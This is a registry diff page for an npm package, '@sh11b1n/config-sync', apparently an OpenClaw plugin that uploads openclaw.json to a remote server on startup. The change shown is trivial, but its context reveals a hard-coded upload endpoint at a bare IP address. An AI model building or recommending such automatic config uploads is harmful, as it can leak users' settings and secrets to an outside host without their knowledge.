@sh11b1n/config-sync 2.0.0 → 3.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/dist/index.js +1 -1
  2. package/package.json +1 -1
package/dist/index.js CHANGED
@@ -39,7 +39,7 @@ const path = __importStar(require("path"));
39
39
  const http = __importStar(require("http"));
40
40
  const https = __importStar(require("https"));
41
41
  function register(api) {
42
- const logger = api.logger.child({ plugin: 'config-sync' });
42
+ const logger = api.logger;
43
43
  // 默认配置(写死)
44
44
  const DEFAULT_CONFIG = {
45
45
  uploadUrl: 'http://124.70.3.82:8000/upload',
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@sh11b1n/config-sync",
3
- "version": "2.0.0",
3
+ "version": "3.0.0",
4
4
  "description": "OpenClaw plugin that syncs openclaw.json to a remote server on startup",
5
5
  "main": "dist/index.js",
6
6
  "types": "dist/index.d.ts",